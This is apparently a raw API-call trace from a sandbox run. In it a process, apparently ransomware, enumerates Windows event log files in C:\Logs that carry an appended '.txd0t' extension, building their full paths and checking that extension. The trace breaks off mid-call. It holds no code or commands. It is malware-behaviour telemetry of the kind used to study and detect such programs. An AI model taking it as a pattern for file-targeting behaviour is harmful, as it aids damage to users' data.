[0128.929] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9dcc480, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9dcc480, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a170e66, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-HotspotAuth%4Operational.evtx.txd0t", cAlternateFileName="MIDA33~1.TXD")) returned 1 [0128.929] StrCmpW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.929] StrCmpW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.929] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.929] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.929] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-HotspotAuth%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.txd0t" [0128.929] PathFindExtensionW (pszPath="Microsoft-Windows-HotspotAuth%4Operational.evtx.txd0t") returned=".txd0t" [0128.929] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.930] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b4bacf, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b4bacf, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a1bd3c4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.txd0t", cAlternateFileName="MI57B1~1.TXD")) returned 1 [0128.930] StrCmpW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.txd0t", psz2=".") returned 1 [0128.930] StrCmpW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.txd0t", psz2="..") returned 1 [0128.930] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.930] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.930] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.txd0t" [0128.930] PathFindExtensionW (pszPath="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.txd0t") returned=".txd0t" [0128.930] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.930] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb66288f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb66288f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a1e35d3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-International%4Operational.evtx.txd0t", cAlternateFileName="MI9FED~1.TXD")) returned 1 [0128.930] StrCmpW (psz1="Microsoft-Windows-International%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.930] StrCmpW (psz1="Microsoft-Windows-International%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.930] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.930] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.930] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-International%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.txd0t" [0128.930] PathFindExtensionW (pszPath="Microsoft-Windows-International%4Operational.evtx.txd0t") returned=".txd0t" [0128.930] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.930] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506ad1ac, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x506ad1ac, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a255d1b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-Boot%4Operational.evtx.txd0t", cAlternateFileName="MI911F~1.TXD")) returned 1 [0128.930] StrCmpW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.930] StrCmpW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.930] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.930] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.930] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-Boot%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.txd0t" [0128.930] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-Boot%4Operational.evtx.txd0t") returned=".txd0t" [0128.930] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.930] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a314850, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.txd0t", cAlternateFileName="MIDAB4~1.TXD")) returned 1 [0128.930] StrCmpW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.txd0t", psz2=".") returned 1 [0128.930] StrCmpW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.txd0t", psz2="..") returned 1 [0128.931] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.931] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.931] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.txd0t" [0128.931] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.txd0t") returned=".txd0t" [0128.931] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.931] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5071f8b0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5071f8b0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a2c8c55, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x101200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-PnP%4Configuration.evtx.txd0t", cAlternateFileName="MI3E50~1.TXD")) returned 1 [0128.931] StrCmpW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx.txd0t", psz2=".") returned 1 [0128.931] StrCmpW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx.txd0t", psz2="..") returned 1 [0128.931] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.931] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.931] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-PnP%4Configuration.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.txd0t" [0128.931] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-PnP%4Configuration.evtx.txd0t") returned=".txd0t" [0128.931] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.931] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ebf6d7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc8ebf6d7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a2c8c55, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.txd0t", cAlternateFileName="MIAAF5~1.TXD")) returned 1 [0128.931] StrCmpW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.txd0t", psz2=".") returned 1 [0128.931] StrCmpW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.txd0t", psz2="..") returned 1 [0128.931] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.931] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.931] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.txd0t" [0128.931] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.txd0t") returned=".txd0t" [0128.931] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.932] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5090f75d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5090f75d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a314850, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.txd0t", cAlternateFileName="MI3346~1.TXD")) returned 1 [0128.932] StrCmpW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.932] StrCmpW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.932] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.932] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.932] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.txd0t" [0128.932] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.txd0t") returned=".txd0t" [0128.932] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.932] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd75102f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd75102f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a33aa7c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.txd0t", cAlternateFileName="MIF0C1~1.TXD")) returned 1 [0128.932] StrCmpW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.932] StrCmpW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.932] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.932] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.932] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.txd0t" [0128.932] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.txd0t") returned=".txd0t" [0128.932] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.932] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a445aea, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-WHEA%4Errors.evtx.txd0t", cAlternateFileName="MI98B5~1.TXD")) returned 1 [0128.932] StrCmpW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx.txd0t", psz2=".") returned 1 [0128.932] StrCmpW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx.txd0t", psz2="..") returned 1 [0128.932] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.932] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.932] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-WHEA%4Errors.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.txd0t" [0128.932] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-WHEA%4Errors.evtx.txd0t") returned=".txd0t" [0128.932] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.932] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a360de0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-WHEA%4Operational.evtx.txd0t", cAlternateFileName="MI1236~1.TXD")) returned 1 [0128.932] StrCmpW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.932] StrCmpW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.932] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.932] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.932] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-WHEA%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.txd0t" [0128.932] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-WHEA%4Operational.evtx.txd0t") returned=".txd0t" [0128.932] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.932] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59547c37, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x59547c37, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a445aea, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Known Folders API Service.evtx.txd0t", cAlternateFileName="MI282F~1.TXD")) returned 1 [0128.932] StrCmpW (psz1="Microsoft-Windows-Known Folders API Service.evtx.txd0t", psz2=".") returned 1 [0128.932] StrCmpW (psz1="Microsoft-Windows-Known Folders API Service.evtx.txd0t", psz2="..") returned 1 [0128.933] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.933] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.933] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Known Folders API Service.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.txd0t" [0128.933] PathFindExtensionW (pszPath="Microsoft-Windows-Known Folders API Service.evtx.txd0t") returned=".txd0t" [0128.933] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.933] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb7386e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbb7386e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a386f92, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-LiveId%4Operational.evtx.txd0t", cAlternateFileName="MIE7F8~1.TXD")) returned 1 [0128.933] StrCmpW (psz1="Microsoft-Windows-LiveId%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.933] StrCmpW (psz1="Microsoft-Windows-LiveId%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.933] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.933] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.933] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-LiveId%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.txd0t" [0128.933] PathFindExtensionW (pszPath="Microsoft-Windows-LiveId%4Operational.evtx.txd0t") returned=".txd0t" [0128.933] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.933] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93d06f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93d06f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a3d3484, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-MUI%4Admin.evtx.txd0t", cAlternateFileName="MI70F8~1.TXD")) returned 1 [0128.933] StrCmpW (psz1="Microsoft-Windows-MUI%4Admin.evtx.txd0t", psz2=".") returned 1 [0128.933] StrCmpW (psz1="Microsoft-Windows-MUI%4Admin.evtx.txd0t", psz2="..") returned 1 [0128.933] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.933] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.933] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-MUI%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.txd0t" [0128.933] PathFindExtensionW (pszPath="Microsoft-Windows-MUI%4Admin.evtx.txd0t") returned=".txd0t" [0128.933] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.933] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93aa49b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93aa49b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a3ad292, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-MUI%4Operational.evtx.txd0t", cAlternateFileName="MI18DD~1.TXD")) returned 1 [0128.933] StrCmpW (psz1="Microsoft-Windows-MUI%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.933] StrCmpW (psz1="Microsoft-Windows-MUI%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.933] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.933] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.933] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-MUI%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.txd0t" [0128.933] PathFindExtensionW (pszPath="Microsoft-Windows-MUI%4Operational.evtx.txd0t") returned=".txd0t" [0128.933] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.933] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9d33b19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9d33b19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a3d3484, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-NCSI%4Operational.evtx.txd0t", cAlternateFileName="MIEB31~1.TXD")) returned 1 [0128.933] StrCmpW (psz1="Microsoft-Windows-NCSI%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.933] StrCmpW (psz1="Microsoft-Windows-NCSI%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.933] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.933] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.933] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-NCSI%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.txd0t" [0128.934] PathFindExtensionW (pszPath="Microsoft-Windows-NCSI%4Operational.evtx.txd0t") returned=".txd0t" [0128.934] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.934] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbcf0ff2, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbcf0ff2, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a3f9672, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-NetworkProfile%4Operational.evtx.txd0t", cAlternateFileName="MI164E~1.TXD")) returned 1 [0128.934] StrCmpW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.934] StrCmpW (psz1="Microsoft-Windows-NetworkProfile%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.934] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.934] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.934] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-NetworkProfile%4Operational.evtx.txd0t", cchMax=1040 | out: 